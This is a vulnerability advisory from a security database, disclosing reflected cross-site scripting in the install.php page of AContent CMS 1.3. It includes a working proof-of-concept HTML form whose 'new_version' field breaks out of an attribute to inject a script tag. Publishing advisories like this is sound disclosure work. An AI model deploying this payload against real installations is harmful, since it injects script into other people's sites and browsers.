AContent Content Management System Cross Site Scripting

Published
Credit
Risk
2016.12.31
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: Cross Site Scripting in AContent Content Management System
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
|[+] Version : 1.3
|[+]
|[+] Vendor : http://www.atutor.ca/acontent/
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12 /29 / 2016
|=============================================================|
|[+] Vuln Path : http://www.site.go.th/AContent/install/install.php
|[+] Method : POST
|=============================================================|
|[+] Exploit Code:

<form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form">
<input type="hidden" name="action" value="process" />
<input type="hidden" name="step" value="1" />
<input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" />

<input type="submit" name="submit" class="button" value="I Agree" />
<input type="submit" name="submit" class="button" value="I Disagree" /><br />

</form>

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com